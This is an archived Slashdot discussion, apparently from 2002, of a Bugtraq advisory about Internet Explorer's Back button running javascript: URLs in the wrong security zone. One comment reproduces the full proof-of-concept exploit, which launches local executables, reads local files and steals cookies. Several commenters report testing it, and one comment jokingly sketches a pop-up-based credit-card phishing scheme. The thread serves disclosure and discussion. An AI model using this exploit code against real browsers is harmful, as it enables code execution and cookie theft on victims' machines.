Don't Hit That Back Button

Saint Aardvark writes: "From the Bugtraq mailing list comes this warning: 'Using the Back Button in IE is dangerous'. When hitting the back button, javascript links will be executed in the security zone of the last url viewed. Proof-of-concept included in the warning will execute minesweeper or read your Google cookies."

Go Mozilla!

With every passing week, MS gives us more and more reasons not to use their POS browser. Whereas Mozilla is quickly becoming the undisputed king; tabbed browsing, filtering popups, better security options, and .. oh yeah, it's open source.

Take that, Microsoft. ;-)

Re:Go Mozilla!

[moonbender]

Tune your settings (prefs - history and cache) a bit to reduce resource useage. I've seen it work fine on computers with 32 MB RAM, way, way faster than either IE or NN, so it doesn't really need all those resources it takes, though of course they don't hurt.
Opera isn't really faster anymore than IE when you're viewing only one page at a time. If you're viewing half a dozen or more, IE really sucks while Opera is godlike. Switching between windows is virtually instant.
Oh and not to mention mouse gestures. I doubt I can ever use a browser without mouse gestures again.
As for DHTML support, yep, it sucks, but well, DHTML sucks, too. It's rarely used appropriately, much like Flash it's more of a proof of a web designers incompetence and reliance on flashy effects rather than solid content.

Re:Go Mozilla!

[Gibbys+Box+of+Trix]

It will have an effect on the stats gathered, but it wouldn't inflate the stats on IE6.0 because it can't identify it'self as IE6.0, only IE5.0.

Still, it'd be interesting to know what percentage of the MSIE5.0 and Netscape and Others were attributable to Opera.

Re:Go Mozilla!

[rapid+prototype]

yeah... those genius open-source guru types who know how to close an HTML tag...

-rp

Re:Go Mozilla!

[Com2Kid]

Damn thing is;

I have no fucking clue who halle barry is (reconize the name from something but no idea wha)

who brooke gordon is

WTF presa canario is

who anni friesinger is

I reconize the term dudley moore, but, uh WTF who/is it?

no idea who jeff gordon is,

but at least Anime is #1 on Google images! :)

Re:Go Mozilla!

[Sj0]

er....K-Meleon?

I'm afraid not. K-Meleon is significantly faster than most other browsers in every circumstance I've tested it on.

On a (somewhat) related topic...

[webword]

Attack of the Back Button -- "Getting stuck on a web page can be painful. The back button doesn't always work. While there are many ways to escape from web pages, many users don't know the tricks. A company can stop hurting users by doing more testing, using proper development methods, and being aware of the issue."

Re:On a (somewhat) related topic...

[WhaDaYaKnow]

users who get stuck on pages simply close the browser window.

Which is exactly what you want because this generates an onunload event. At which point you can open a new window, which should preferably load a pop-under window, which has a hidden Flash object that plays a very loud siren.

Then when the user moves the mouse cursor outside of the window, you maximize the window and load a duplicate pop-under, which also plays the siren. Because although one siren is good, two sirens are better.

Now that you start getting the attention of the user, you load a full screen pop-up window, without borders, and in this window you will load an images to make it look exactly like a browser.

In the meantime the volume on the (hidden) Flash players should have increased to the absolute maximum, and you could even consider switching one over to a screaming cat. (Obviously the onunload handlers for the pop-under windows should open AT LEAST two pop-under of similar quality.)

Back to the front page,- now that you have full control over the browser look and feel, you can conveniently move any 'close' or 'back' buttons out of the way as soon as the mouse pointer gets too close.

At this point in time, you have increased the chances of getting a credit card number out of the user significantly, so it's up to you to present the user with the ability to enter their information.

The best way to achieve this is to just have the text box that you want filled out follow the mouse. Not all users are very smart, so keep what you want done obvious.

Once the information is obtained, change the page to read something among the lines that the user should absolutely NOT attempt to do anything, but most of all, not close any windows!, because his credit card may be charged twice.

After a last check that all pop-unders with screaming Flash players are still going strong, you are now done.

Re:On a (somewhat) related topic...

[psocccer]

I agree the back button thing can be irritating, but sometimes you can't really work around it, e.g. if the page is dynamic and the data can change and the back button can become a data-integrity nightmare. Sure it can help to use transaction ID's and make sure nothing happens twice, but it's annoying to me as a web developer. Sometimes I wish there never was a back button.

For a concrete example of problems w/ the back button, check out acmemail. It's a cool webmail client, uses perl and pop3, but if a user clicks back, usually after reading a message and wanting to get back to the message list, it will cause strange problems and eventually auto-log them out. It took a long time to teach the outside sales staff at work that you just need to click the "inbox" button instead of back, and to this day every time there is a meeting they mention that webmail is broken, then I check it out, find out they're using back, and explain the solution. Then the next meeting comes and it's square one all over again...

Re:On a (somewhat) related topic...

[rjamestaylor]

learn the user interface of your development platform, adhere to its principles even at the risk of causing you, the developer, more work and you'll have much happier users.

Re:On a (somewhat) related topic...

[jesser]

Hotmail does not have this problem. Netscape webmail does not have this problem. It's a bug in your code, and I bet you would have saved time by fixing it rather than trying to "teach" your users how to work around it.

Re:On a (somewhat) related topic...

[ewhac]

You work for Salon, don'cha?

:-),
Schwab

Re:On a (somewhat) related topic...

[civilizedINTENSITY]

Adding to the list: Yahoo! mail doesn't have this problem. FastMail doesn't have this problem.

Re:On a (somewhat) related topic...

[Skweetis]

Actually, it may not be a bug. His webmail program may use POST instead of GET to pass data between screens. This is more secure than using GET (remember the Hotmail bug where you could read anyone else's mail by figuring out the URL to it? That was a GET problem.) Most browsers don't handle POST all that well when navigating through cached pages. Although this is really a browser issue, you are correct in that he could probably adjust his webmail to compensate if he is clever.

Java's been crashing IE of late

[blair1q]

So it may not matter.

http://arizona.diamondbacks.mlb.com crashes both IE6 and IE5.

I don't know why. Could be the address it crashes at has a hardware problem on my machine. But why is java poking around my hardware?

Java is insecure, Windows is insecure, the Internet is insecure, and everyone using them has always known that.

--Blair

Re:Java's been crashing IE of late

[mattr]

Not true with my copy (Win2K Japanese, IE5.50)if same url.

Redirects to http://arizona.diamondbacks.mlb.com/NASApp/mlb/ari / omepage/ari_homepage.jsp

Re:Java's been crashing IE of late

[evil_one]

My roommate had IE crash on any site that used Javascript. Then I removed the spyware from his computer. Wow... what a difference.

Re:Java's been crashing IE of late

[asv108]

Java is insecure

I think your reffering to JavaScript orginally called livescript by Netscape before the Java buzz hit. JavaScript has nothing to do with Java. Java is relatively secure by most standards.

Re:Java's been crashing IE of late

[ivan256]

Holy fucking weird, dude. That's a strange bug. Just verified it on IE 5.00.3314.2108 with the 128bit security update.

Re:Java's been crashing IE of late

[diesel_jackass]

I blame those damn popup ads.

Re:Java's been crashing IE of late

[NutscrapeSucks]

Did you install Sun Java 1.4? It has the "feature" of taking over Java support from the MS JVM. On my box, this almost always results in a hung browser.

You can disable this behavior in the Java control panel.

Re:Java's been crashing IE of late

[civilizedINTENSITY]

Of course when I install the newest Java, I want it to be used. Window's JVM is stuck back at where the courts caught them "screwing the pooch". Nobody really uses the MS JVM, do they? Radically limits what you'd be able to view, I'd think.

Re:Java's been crashing IE of late

[Peyna]

The images all save, they are hosting at 'home.hp.com' or some such place.

This doesn't worry me.

I don't have anything special in my Google cookies and I like to play minesweeper.

Re:This doesn't worry me.

[enderak]

Yeah, until it learns to play for itself and beats all your high scores...

How far can you exploit this?

[Agelmar]

Would a vulnerability still exist if a user wrote a page that redirected the browser to some page with malicious code in the target, and then, with a little bit of javascript set the location to javascript:history.back() (i.e. on mouse movement or whatever). Would this cause the javascript to run under the improper security settings, or does the user actually have to hit the "back" button?

Proof-of-Concept

[acm]

<html>
<h1>Press link and then the backbutton to trigger script.</h1>
<a href="javascript:execFile('file:///c:/winnt/system 32/winmine.exe')">
Run Minesweeper (c:/winnt/system32/winmine.exe Win2000 pro)</a><br>
<a href="javascript:execFile('file:///c:/windows/syst em32/winmine.exe')">
Run Minesweeper (c:/windows/system32/winmine.exe XP, ME etc...)</a><br>
<a href="javascript:readFile('file:///c:/test.txt')"& gt;
Read c:\test.txt (needs to be created)</a><br>
<a href="javascript:readCookie('http://www.google.com / )">
Read Google cookie</a>

<script>
// badUrl = "http://www.nonexistingdomain.se"; // Use if not XP
badUrl = "res:";
function execFile(file){
s = '<object classid=CLSID:11111111-1111-1111-1111-111111111111 ';
s+= 'CODEBASE='+file+'></OBJECT>';
backBug(badUrl,s);
}
function readFile(file){
s = '<iframe name=i src='+file+' style=display:none onload=';
s+= 'alert(i.document.body.innerText)></iframe&g t;';
backBug(badUrl,s);
}
function readCookie(url){
s = '<script>alert(document.cookie);close();< "+"/script>';
backBug(url,s);
}
function backBug(url,payload){
len = history.length;
page = document.location;
s = "javascript:if (history.length!="+len+") {";
s+= "open('javascript:document.write(\""+payload+"\")' )";
s+= ";history.back();} else '<script>location=\""+url
s+= "\";document.title=\""+page+"\";<"+"/script> ';";
location = s;
}
</script>
</html>

Re:Proof-of-Concept

[guran]

Well...

I tried this on one of our IIS machines, but the virus protection took care of it immediately (renaming the file to .htm.vir)

Re:Using Linux considered harmful

Linux advocacy on IRC, in a nutshell:

Q: Internet Explorer has a lot of security bugs. What do I do?

A: Install Mozilla.

Q: Windows has a lot of security bugs. What do I do?

A: Install Linux.

Q: Somebody cracked into my default installation of Red Hat 6.2. What do I do?

A: Didn't you RTFM? Everybody knows that you have to keep patching the system to keep people out of it! Why don't you go to Windows, dumbass?

Unfair to release the advisory before fix...

[NoMoreNicksLeft]

If they had waited til tomorrow, they'd have known about M$'s fix for this dangerous security hole. SP3 for IE6 patches it up fine though. That's right, when you mouseover the back button, a popup text alerts you that it might be dangerous (that M$ can't be held responsible for damages resulting from its use?). Also, the "Safe Back Button" is now next to it, but to get it out the door in time, they've had to rush. Yes folks, it uses the exact same codebase as the back button, and no, I don't see that as a problem. Besides, if it is, they'll fix it with SP4, and the "Really Safe Back Button". Right along side the other two, for backward compatibility.

Test it out if you have IE

[ekrout]

I copied the source from the (now Slashdotted) page and created an HTML file at http://www.eg.bucknell.edu/~ekrout/IE_Hack.html for those of you with IE to test it out. If you want, reply to this post and let everyone know if it works with your browser, Windows version, etc.

This is a very troubling security hole for Windows users who prefer IE (99.7% of them).

Founder, monolinux

Re:Test it out if you have IE

[Tjp($)pjT]

I guess IE on the Mac works better. No such problems there.

Re:Test it out if you have IE

[Quietust]

The Minesweeper one only worked after I created the directory and copied in the EXE.
One of the advantages of having Windows 2000 installed on drive D (except for the fact that I have a rather outdated install of Win98SE on drive C; gotta get rid of that one of these days).
What bothers me is that it still worked even after I changed the default security level for Local Intranet to High (maximum)...

Re:Test it out if you have IE

[gartogg]

To add to the report, it works on 98 se with 5.5 (after changing the link to go to minesweeper's old location.)

ObJoke, quoted from bugtraq:
"Workaround: Disable active scripting or [!!]never use the back button.[!!]"

Re:Test it out if you have IE

[CmdrSanity]

McAfee stopped it cold.

Re:Test it out if you have IE

[magicslax]

Same with ie on wine. When I pressed back it just gave me a segfault....much better. :-) truth.

by the way, the 'please close all aplications and restart your computer' error window really cracks me up when the app was run under wine in the first place.

Re:Test it out if you have IE

[56ker]

Mind you - I'm sure there's some IE users who've never figured out what the buttons do yet! ;o)

Re:Test it out if you have IE

[NumberSyx]

Worked on NT4/SP6 with IE 6.0

Re:Test it out if you have IE

[sconeu]

Win2KSP2/SRP1 with IE5.5SP2.

Re:Test it out if you have IE

[sconeu]

I have the patch for MS02-015 (Q319182) installed, and Minesweeper fired up.

Re:Test it out if you have IE

[the_quark]

This does not work using IE 5.5 SP2, under Crossover Office Wine on Redhat 7.2. Really. :)

Re:Test it out if you have IE

[digitect]

Win 95B (patched), IE 5.5 -- Worked using a modified path C:/Windows/winmine.exe

(Yes, that's Windows 95. I prefer it.)

Re:Test it out if you have IE

[SaDan]

Worked on W2K, IE 5.5SP2, completely patched.

Re:Test it out if you have IE

[Waffle+Iron]

by the way, the 'please close all aplications and restart your computer' error window really cracks me up when the app was run under wine in the first place.

That's what I love about using Win4Lin:

"Windows needs to restart in order to complete your request to change the default window frame color. Press OK to restart."

I press OK, and Win98 "reboots" in 7 seconds flat.

Re:Test it out if you have IE

[jmorse]

This works on 6.0.2600.0000 on Win2K. Seems like we get a new IE loophole every week.

Re:Test it out if you have IE

[Technician]

Due to time on a modem and slow loading pages at home, I usualy open new pages in a new window to let them load while reading the original page. I run with scripting off so pop-ups don't get out of hand. I didn't get to choose a browser at work. I seldom use the back button. I usualy use ALT-F4.

Re:Test it out if you have IE

[Kris_J]

I have IE 6.0.2600.whatever running on Win98SE. However, I also have F-prot anti-virus and the Proxomitron filtering proxy. F-prot spotted the exploit immediately an proxomitron stopped the link from activating anyway. (I hate javascript pop-ups.) I never got the the bit where I would be pressing the back button.

Re:Test it out if you have IE

[LinuxGeek]

You don't have win2k installed on drive c:.

Re:Test it out if you have IE

[LinuxGeek]

Thanks dude! I remembered that I hadn't played minesweeper in months! Well, atleast since I installed WinXP(erimental).

Re:Test it out if you have IE

[ekidder]

I am running Win2k with IE6.0.2600.0000. Actually, I'm running Netcaptor, but it uses IE, so it's mostly the same. Everything is updated to the latest. That said...

#1 and #3 worked. #2 didn't do anything. #4 brought me to the Google web page.

Re:Test it out if you have IE

[Grond]

On my laptop which runs Windows 2000 and has IE 5.5 completely up to date (i.e., I just went to WindowsUpdate and installed the latest security updates), the exploit works on all the tests (well, except for the Minesweeper exploit targeted at Win98/ME, obviously).
So, unless it's fixed in IE 6, and I see no evidence of this, then this is not something that Microsoft has addressed yet.

Re:Test it out if you have IE

[Jayde+Stargunner]

WinXP, IE 6.0. Does not have any effect whatsoever. Just pauses ona blank screen.

-Jayde

Re:Test it out if you have IE

[hyrdra]

Win2k SP3-b, IE version 5.00.2920.0000

Does not work, giving access denied and page not found errors.

Re:Test it out if you have IE

[SomeGuyFromCA]

it still worked even after I changed the default security level for Local Intranet to High

That's because this doesn't work off local intranet, it works off local hard drive; files on your hard drive are automatically ran without safeties, and MICROS~1 does not offer any option to change this.

Re:Test it out if you have IE

[Sentry21]

I actually have my own test URL up (http://www.cdslash.net/temp/back.htm which makes a great companion to my XP logout exploit which works great in IE6 (that example logs out WinXP and Win2K with crappo security settings. If you don't have a logoff.exe, you're fine).

Results so far, it works for me, but it does NOT work for a friend who is running Win98, as I am, but IE 5.x instead of 6.0 (which I have).

--Dan

Re:Test it out if you have IE

[Diabolical]

Works with MS 2000, IE 6.0.2600.0000 Latest "security" updates.

Re:Test it out if you have IE

[greenrd]

Actually, there is a registry hack to enable security configuration for "My Computer". But it's so annoying I wouldn't recommend it. As you browse around your HD in explorer it keeps warning you about ActiveX controls (i.e. explorer's built-in file displaying stuff. It's stupid.

Re:Test it out if you have IE

[Alsee]

TESTED AND VERIFIED UNDER GAMESPY ARCADE

This vulnerability affects applications which integrate IE functionality!

Gamespy "GameSpy Arcade is the #1 online gaming service... Support for over 300 of the leading games and demos".

-

Re:Test it out if you have IE

[mcrbids]

None of the links worked using IE 5.0 on Win98.

-Ben

Re:Test it out if you have IE

[Perdo]

I works great... I'll never have to go through the arduous process of working my way through my start menue ever again.. or yours for that matter..

Re:Test it out if you have IE

[NMerriam]

winXP Pro with IE6 (all patches up to date from windowsupdate) and the cookie works, the minesweeper seemed to take a few tries. Most of the time it just wound up with a blank IE page, but there may just be some sort of latency launching the app.

Re:Test it out if you have IE

[RWarrior(fobw)]

AVP caught and blocked it. This is with the Apr 8 2002 database.

Re:Test it out if you have IE

[Chanc_Gorkon]

This worked for me.....March 28th Cumulative patch

My company's solution to IE

[Ali+Jenab]

It's been almost five years since Microsoft released their first acknowledgement of a security vulnerability in Internet Exploder. I remember the day that happened clearly; if only I had the foresight at the time to see that the same exact scene would play out, on the average, once every two weeks for the next five years. I could have avoided disaster for my company.

Back in 1999, when the dot-coms were flying high and my company resembled an Internet startup (although we had been in business since 1992), we hastily set up new offices and cubicles with little regard for information security. After all, what was the worst that could happen - an email worm? Well, we quickly found out: a malicious hacker had targeted our company, and sent an email to "all @" my domain containing a link to a supposed Yahoo News story. Unfortunately, this link sent the employees to a malicious site that caused their insecure IE browsers to yield control of nearly every Windows PC in the company to the intruder. They stole and destroyed much important data, and took over a week of nonstop unpaid overtime to fix things.

A few weeks after the incident, our vice president of operations mandated a Mozilla-only policy. Employees were forbidden from running IE, Lynx (another notoriously insecure browser), and Konqueror (which crashed constantly anyway). Since that time, we have had zero browser related security issues, and employees waste far less time surfing the web, mainly because a lot of time-wasting sites only work in Microsoft standards-compliant browsers. Converting to Mozilla has been a win-win situation, and I fully expect the same to be happening across America after this latest IE security breach. Enough is enough; we need to take back control of our networks.

/ali

Re:My company's solution to IE

[MADCOWbeserk]

Somehow I doubt this story. I have seen Netscape 4.X mandated, but Netscape itself had several security issues itself (brown oriface) Back in 1999 Mozilla sucked. It is only in th .9X braches that Mozilla/Netscape 6.X became usable. Whose environment offers a choice between Konq. Lynx Ie. and Mozilla, wondering where he sampled IE/Linux, Lynx and Konq/Win32. Finally, any self respecting company should have had their mail server configured to throw out those messages as junk.

Frankly I love Mozilla, (especially with the Pinball theme). It has a great interface, and has become quite stable. However from a security standpoint it is still up in the air as to how secure it will be.

Mozilla has a bright future. I would like to see it replace explorer as well IE. It would really screw Microsoft to lose the UI along with the browser.

Re:My company's solution to IE

[Baki]

My companies solution (large bank in switzerland) is to roll out IE, but disable active-X, javascript and cookies for the "Internet Zone". i.e. the standard browser is almost useless.

Everyone keeps using NS4 (the former "official" browser) or installs some other browser themselves.

Re:My company's solution to IE

[civilizedINTENSITY]

uh-oh...what about lynx? First I'd heard about lynx having security issues...could someone fill me in?

Re:My company's solution to IE

[NMerriam]

...mandated a Mozilla-only policy...employees waste far less time surfing the web

No wonder -- it takes so long for a new window to open in Mozilla, they forget what site they wanted to visit!

Re:My company's solution to IE

[Lumpy]

They stole and destroyed much important data, and took over a week of nonstop unpaid overtime to fix things.

Wow... I hope you left the company right then and there.. Any scumbag boss that would even ask for employees to work late un-paid deserves to be A. bailed on in a tight situation, and B. reported to the labor board for illegal labor practices. Even salaried employees are afforded rights. No company owns you and a smart employee will instantly get in writing what compensation will be given for the extra work (2 days paid vacation for every 8 hours overtime worked is very fair, and the MINIMUM I accept.

People, in any situation your boss tried to use you as slave labor... Run away as fast as you can.

Re:My company's solution to IE

[Cally]

Personally, I'm amazed that anyone still uses IIS - yet Netcraft's survey shows that usage has been steadily increasing - ever since CodeRed and Nimda. Go figure! (When I first noticed this trend emerging in the Netcraft charts, I thought it must just be a blip caused by some major Apache-based hoster going bust... but by the third or fourth month in a row with a declining share, I realised that it's time to surrender all hope for humanity. We're doomed -- and we deserve it.)

No doubt, last week's TEN new IIS security holes, announced by Microsoft all in one go (smart move...take the publicity hit all in one go, rather than dribble the news out AS THE HOLES ARE CONFIRMED (or even "as the patches become available"). Of course, such behaviour is diametrically opposed to the interests of those fools still running IIS; but then, it shouldn't be a surprise by now that PR is a bigger priority than security for Microsoft. "Trustworthy computing", my sweaty arse!

If I ever become a manager, installing IIS or IE will be a sacking offence. I simply cannot understand why the much trumpeted "shareholder value" and "due diligence" and "director's personal liabilities" have not seen IIS dropped like a dead fish from any half-way competently run web site.

My sympathy, by the way, to any unfortunates trapped in a job where you must admin an IIS. I suggest a stealth Apache install, perhaps as a hotfailover system - next time you have to kill IIS for "emergency maintenance", point out to the pointy haired cretins that you won't have any downtime, as you may always rely on Apache being there to pick up the slack.

Re:My company's solution to IE

[Lumpy]

Many companies take advantage of the employees.. Great example is that you are asked to work overtime for free while your boss is nowhere to be found (sorry, if you ask your employees to sacrifice their free time so do you.) If an employee does it for free without asking, that's the employee's problem... if you are asked or threatened to work free.... you did it on your own, that IS different in every way, and you were rewarded.. if your boss said "thanks" and that was it or mentioned that "that's part of your job" I stand by the run like hell advice.

Re:My company's solution to IE

[Baki]

Indeed, this bug might offer users a "legal" way to access sites with javascript :)

This catch anyone's eye?

[Omerna]

"Microsoft contacted 12 Nov 2001, additional information given 25 Mar 2002."

That's pretty long time (5-6 months, too lazy to figure out the actual number of days etc.) that Microsoft has done nothing (at least not a fix). Especially because this overlaps the time when they decided to make their people go to security workshops (or some such). If they can't even fix a known, reported bug in the security how can they find them on their own and fix them? Or not write them in the future?

Oh yeah, it'd be nice to know if I can get around this by doing "right-click" / "back" or if that is affected and not JUST the toolbar.

Re:This catch anyone's eye?

[ukryule]

"Microsoft contacted 12 Nov 2001, additional information given 25 Mar 2002."

Well that links in well with the memo Bill Gates sent on January 15th. What was it he said?

"We have done a great job of having teams work around the clock to deliver security fixes for any problems that arise. Our responsiveness has been unmatched ..."
Hmm - that was before the new emphasis on security ...
"If we discover a risk that a feature could compromise someone's privacy, that problem gets solved first."

Given those comments, how can they not have done anything about this? Doesn't sound like a fundamental problem that would take a massive effort to fix.

Re:This catch anyone's eye?

[nitehorse]

Do you happen to have a link?

People are reporting that with fully-patched IEs they are still seeing this. I'd suggest you double-check.

Re:This catch anyone's eye?

[iabervon]

MicroSoft said they were stopping all other work while they found and fixed security holes lurking undiscovered in their software. They're obviously not going to take time out of this important project to fix known security holes. Things like releasing patches and applying them to their websites will have to wait until the entire codebase has been carefully examined.

Re:This catch anyone's eye?

[Tony-A]

Snicker. Oh, you want a working patch.
Ever wonder why Microsoft doesn't want exploit code published?

Should it be wehavethewayout^H^H^Hback.com ;)

Re:So...

[Cramer]

That assumes you have a support contract so they'll pay you any attention at all. Good luck simply getting the "feedback" page so you can submit a bug (which no one will ever look at.)

Back buttons

[56ker]

" 'Using the Back Button in IE is dangerous'." - since when was using anything in IE safe? ;o)

Re:Back buttons

[British]

I think the worst one I ran into was I was simply watching an AVI, and as soon as I closed the Media Player window, it took me to the AVI file vendor's website.

Re:Back buttons

[arkanes]

Windows supports the encoding of URLs into AVI files in metadata somewhere (WMP files as well, of course). It's a media player "feature".

A complete list

[rosewood]

Other then just clicking on the MS link, is there a site devoted just to the fuckups of MS? From calling the GPL cancer to dumb ass bugs like this, I would love a good site so that every time I see a post on shacknews that says "People just hate MS because everyone hates them, Windows 98 was fine and worked great for me"

Re:A complete list

[mrogers]

Other then just clicking on the MS link, is there a site devoted just to the fuckups of MS?

Yes there is, and you're looking at it right now.

Re:A complete list

[jesser]

I wouldn't call this a "dumb ass bug". It's subtle, and finding it requires being aware of several things and thinking to combine them:

* javascript: URLs run in the security domain of the page from which they originate. (Or, if they're stored in the user's bookmarks, they run as part of the current page, letting them do cool things like show the HTML source of the selection.)

* If a javascript: URL returns a non-null value, it acts like a data: URL. For example, javascript:1+2;3+4 is equivalent to data:text/html,7. (Most of the time, this is just an annoyance, forcing you to put "void 0" at the end of a javascript: URL unless you're sure that the last calculation always returns null.)

* It is possible to go "forward" from a javascript: URL.

* The Back button incorrectly runs a javascript: URL in the security domain and context the current page instead of running it with no context or with the context of the page that put the URL in session history.

The fact that the bug was present in both IE and Mozilla until Mozilla 0.9.3 is strong evidence that the hole is not an obvious "dumb ass bug". I only discovered the hole because I make bookmarlets (javascript: URLs) in my free time and was being paid by Netscape to work on Mozilla security last summer.

Re:A complete list

[maxpublic]

I think it might qualify as a "dumb ass bug" because despite having been informed of the problem last November MS failed to fix the exploit - even after their two-month 'security review'.

So the bug went from 'subtle' in November to 'dumb ass' today because the lackwits in Redmond completely ignored it - hence the label. As in, "only a dumb ass would ignore this bug".

Max

Go Mozilla Anyways!

[KagatoLNX]

Bench the latest Mozilla build (turn off debugging and turn on optimization, just like a normal release build) and post that again. Of course, to really shine, run it on Linux or a free BSD.

Seriously, it's fast and its implementation of little things like CSS (which as far as I'm concerned is the future of online content) is light years ahead if IE anyways.

Then again, you might be interested to know that as of IE 5.5, IE was backported from the Macintosh version. That's right, the MS-IE-Mac-port team did it so much better that they backported it to Windows. That's where the speed and decent standards support came from!

I think that this goes to show that Microsoft doesn't re-write something from scratch on purpose. They had to force their Mac team to basically do so (because, like, it's IE not on Windows, you have to redo a bunch of stuff) before they figured out that they needed to reimplement. The sad thing is that they don't seem to be willing to do it where it counts, no matter how "security focused they become" they don't ever figure out that it's impossible to effectively rewrite Windows "a piece at a time".

Re:Go Mozilla Anyways!

[crisco]

Then again, you might be interested to know that as of IE 5.5, IE was backported from the Macintosh version.

I'm curious about this, do you have more info or a a reference for this? I know that IE 5.5 had a significantly longer startup time than IE 5 on my ancient Win95 computer, but then IE 5.5 still had the CSS box model problems that IE 5 Win had that IE 5 Mac had done correctly (one place I found something on this).

Re:Go Mozilla Anyways!

[KagatoLNX]

Mmmmmmmm. I can't find the pages anymore. I found that tidbit in a link off of an old topic on /. (remember when MS was about to release 5.5 with little to no CSS1 and DOM support and the W3C raised hell?). I can't seem to find it anymore. After more thinking, I think it was just the rendering engine, and they may have slid it in a Service Pack (SP1?).

You can find a few articles around the web about IE 5.5 for Mac doing it right, but I can't find the explicit reference to the codebase being ported.

Well, there are 3 options:
1) I'm wrong (very possible)
2) I heard it on the Internet so it must be true (see #1)
3) The Microsoft Censorship Conspiracy (possible, but paranoid)
4) It really happened that way.

Pick the one you like, but that's what my memory recalls.

Re:Go Mozilla Anyways!

[Darren+Winsper]

IE5.5 was not backported from the Mac version. If they did, they certainly broke a lot of it. IE6 I could see, although I doubt it, it's more likely they simply improved the IE5.5 engine.

As for Mozilla being lightning fast, this isn't so. OK, it's not bad at HTML and CSS, but its DOM support is too slow right now. It's complete, but lacks speed, and it's not going to improve much until post1.0.

Re:Go Mozilla Anyways!

[MindStalker]

Document Object Model. Generally its a higharchy or variables about your page (basically everything on the page can be referenced in some way) that javascript (or some other method) can reference and change. The speed of this reference matters for dynamic web pages, but I have seen very little evidence showing that mozilla has a slow DOM, but a LOT of discussion about it.

Makes it easy to explain M$ vs. Free Soft

[mattr]

At first I thought wuh? But of course I was in Mozilla, so I didn't see the problem. IE executed it exploit right away.

Free Software ought to get better press from this, as it underscores a major truism.

In Free Software, new versions are generally made and released due to added functionality or fixed bugs. Anything else is a waste of time for the programmers, right?

With the exception of a very huge vulnerability that was finally fixed with IE SP2 (though who knows what else that contained), new software versions from Microsoft seem due to an entirely different set of reasons, like:

- breaking more fledgling standards
- making news
- embracing/extending
- press releases
- etc

Re:hm

[jspaleta]

" I still can't figure out why people are using IE, seriously."

1)Bundled....people are sheep.
2)Bundled.....a lot of people dont have the band or the patience to do a lot of downloading (AOL users on dialup)
3)Bundled...on a corporate win2k desktop where the user just logins in and cant really install much in the way of software...see 1) s/pc support personal/people

-jef

yay for NAI

[diesel_jackass]

http://diesel.2y.net/mine.htm

my McAfee VirusScan already checks for this bug.

Re:yay for NAI

[Tryfen]

However, because it is not usually possible to clean or delete the offending page, it is possible to get the code to run.

Re:yay for NAI

[diesel_jackass]

IE or virusscan?

I guess it really doesn't matter because neither of them ever crash for me.

RTFE (exploit)

[gartogg]

If you read the exploit, you would see why this would not be possible.

You do not need to actually press the button, but you need to do it from a trusted page.

yearning for the past

[Faust7]

When I spent hours in labs browsing with Netscape 2.0...

When a webpage wasn't something you had to figure out how to escape...

When 'Back' meant back...

When there was just smooth uninterrupted navigation, and no pop-ups or banners...

When people could say pretty much say anything anywhere, no DMCA...

... remember that?

Re:yearning for the past

[mosch]

ah yes, NetRape. Remember the good ole' days, when Netscape was the non-standards-compliant enemy, embracing and extending HTML?

Yeah, but you used it anyway, because it could show you the text of the webpage while the images were still downloading, but shitty ole' mosaic you had to wait for all the images, before you could see anything at all....

Re:yearning for the past

[Gary+Yngve]

I remember using lynx in 1994.

Nothing beats:

Would you like to quit? (y/n)

Excellent!

I remember downloading a zmodem client over SuperKermit on a 2400 baud modem.

I was so ignorant and innocent back in those days... some of my friends did not have Internet access, so we all shared the same account and voluntarily did not read each other's email (although that sometimes happened accidently if we were not careful with mailx).

And the joys of figuring out for the first time how to use rm on a file named '-'... Wow, I could go on and on about the old days...

And I'm sure some folks here can tell even older stories.

Re:yearning for the past

[Ioldanach]

ah yes, NetRape. Remember the good ole' days, when Netscape was the non-standards-compliant enemy, embracing and extending HTML?

Yeah, but you used it anyway, because it could show you the text of the webpage while the images were still downloading, but shitty ole' mosaic you had to wait for all the images, before you could see anything at all....

And don't forget the other part... when netscape first came out, IIRC, mosaic could only render gifs, and netscape could render jpegs.

Re:yearning for the past

[Genom]

In HS, I was one of the "privileged few" that got to share a 1200 baud connection to the local university's Gopher system. Ahh...those were the days.

Later, I found out that simply exitting the gopher client would have dropped me to a true unix shell - but I didn't know that at the time. I could have started my Unix education 2 years earlier!

How about from a frame?

[roystgnr]

Would it be possible for a malicious page to load a trusted page in another frame, pause for it to load, then execute a back() in that frame? There are loads of things that javascript isn't allowed to do in a frame from another website, but is back() among them?

If MS had acted... any number of times...

[Wee]

If they had waited til tomorrow, they'd have known about M$'s fix for this dangerous security hole.

If MS had responded back in November when he made the sploit known, or if they had even thought once about security when designing IE, or if they had any kind of decent security model in the OS, or, or, or... then this never would have happened in the first place and MS wouldn't have to patch the barn door after the horse had left. But don't blame the guy who discovered this by trotting out that "don't tell anyone about the security hole until the vendor can fix it" pablum. Security through obscurity isn't, especially when that obscurity is driven my the needs of the marketing group.

You find a hole, you do due dilligence, they don't respond (he gave them months to fix it fer cryin' out loud), you publish. Then, most likely, the vendor publishes a fix based on the real needs of users and not the perceived needs of some business unit looking at a bottom line.

It boggles my mind that one could have a machine rooted simply by browsing the web. A die-hard MS nut at work today was giving me grief over the fact that Red Hat has "published" 500MB of "updates" to "Linux" since version 6.2 and how could the OS be so insecure as to need that many updates... I didn't even have the energy to respond. And I'm all for people running with whatever works for them, but at least I know for a fact that Opera on my machine runs in userland and won't get me rooted. And hopefully, using your favorite browser won't mean data loss and/or a re-image of the OS as well.

But to blame the guy who discovered it? I mean, honestly, for fsck's sake: we're talking about a web browser, you know? Completely compromising a machine via a back button? And it's been known for five months?!? At least MS could tell users to run another browser until they can fix the issue. Or turn scripting off. Or whatever. The fact that it could happen in the first place is just obscene. Or criminal. MS leaves a bad taste in my mind sometimes...

-B

Re:If MS had acted... any number of times...

[NoMoreNicksLeft]

I agree totally with your assessment. However, this happens over and over... in the course of your average week!. I'm sorry if I can't even be serious about this anymore, but I hope you realize I was making a rather dumb joke. I'm kinda suprised that it was even modded up. Really. The entire M$ security situation is so sick anymore, that my humor is probably on the level of really lame vaudeville comedy or something.

Remember these two words. "Trustworthy computing".
*laugh* *laugh* *sob* *sob* *bang* (putting pistol to head, and pulling the trigger, rather than have to support M$ products)

Re:If MS had acted... any number of times...

[Wee]

I'm assuming that was a typo and you meant pabulum, insipid ideas, yes?

Actually, I meant it the way it was spelled. And now that I look at it, dictionary.com has different ideas about what pablum and pabulum mean. But I meant insipid, yes.

